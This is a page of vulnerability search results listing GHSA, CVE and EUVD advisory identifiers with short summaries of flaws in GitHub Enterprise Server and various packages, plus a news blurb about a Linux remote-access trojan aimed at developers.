29575 matches found
GHSA-XX64-WWV2-HCQQ vulnerabilities
Vulnerabilities for packages: pixi, uv...
GHSA-FP55-JW48-C537 vulnerabilities
Vulnerabilities for packages: pixi, uv...
GHSA-PP6C-GR5W-3C5G vulnerabilities
Vulnerabilities for packages: reflex, semgrep, airflow...
GHSA-2C5C-CHWR-9HQW vulnerabilities
Vulnerabilities for packages: opensearch, spark-kubernetes-operator-fips, spark-fips, spark-kubernetes-operator, opensearch-fips, apache-hop, druid, apache-hop-fips, trino, camunda, camunda-zeebe, spark...
Quasar Linux RAT Steals Developer Credentials for Software Supply Chain Compromise
A previously undocumented Linux implant codenamed Quasar Linux RAT QLNX is targeting developers' systems to establish a silent foothold as well as facilitate a broad range of post-compromise functionality, such as credential harvesting, keylogging, file manipulation, clipboard monitoring, and...
GHSA-P334-GFHQ-C7W6 vulnerabilities
Vulnerabilities for packages: jenkins...
GHSA-P3HW-MV63-RF9W vulnerabilities
Vulnerabilities for packages: cargo-audit, jujutsu...
CVE-2026-45152
creationtimestamp| type| source ---|---|--- 2026-05-08 05:58:32+00:00| published-proof-of-concept| https://github.com/uniget-org/cli/security/advisories/GHSA-qqq4-5773-pmw5 2026-05-27 23:01:08+00:00| seen| https://bsky.app/profile/thehackerwire.bsky.social/post/3mmumf5pusa2l 2026-05-27...
GHSA-RMX9-2PP3-XHCR vulnerabilities
Vulnerabilities for packages: tekton-pipelines, tkn, tekton-chains...
GHSA-38F8-5428-X5CV vulnerabilities
Vulnerabilities for packages: hono, seata, spark-fips, keycloak, akhq, knative-kafka-broker-fips, flyway-fips, kayenta, apache-nifi, thingsboard, wavefront-proxy, camunda-zeebe, opensearch, opensearch-fips, nuxeo, spark, elasticsearch-fips, infinispan, kafbat-ui-fips, spark-kubernetes-operator,...
EUVD-2026-28461
An authentication bypass vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to create a local user account, bypassing the configured external identity provider. When external authentication was enabled, the signup endpoint did not properly enforce th...
EUVD-2026-28465
A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirectto query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an...
EUVD-2026-28464
A server-side request forgery SSRF vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a differe...
EUVD-2026-28462
A denial of service vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to cause service disruption by sending crafted requests with deeply nested JSON payloads to an unauthenticated API endpoint. The endpoint parsed user-controlled JSON request bodie...
PT-2026-39212
Name of the Vulnerable Software and Affected Versions Postiz versions prior to commit da44801 Description A Pwn Request issue in the Build and Publish PR Docker Image workflow located in '.github/workflows/pr-docker-build.yml' allows unauthenticated users to execute arbitrary code during the Dock...
CVE-2026-8034
A server-side request forgery SSRF vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a differe...
CVE-2026-8106
A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirectto query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an...
CVE-2026-6736
An authentication bypass vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to create a local user account, bypassing the configured external identity provider. When external authentication was enabled, the signup endpoint did not properly enforce th...
CVE-2026-7541
A denial of service vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to cause service disruption by sending crafted requests with deeply nested JSON payloads to an unauthenticated API endpoint. The endpoint parsed user-controlled JSON request bodie...
CVE-2026-8106 Reflected HTML injection vulnerability in GitHub Enterprise Server Management Console login page allowed credential theft
A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirectto query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an...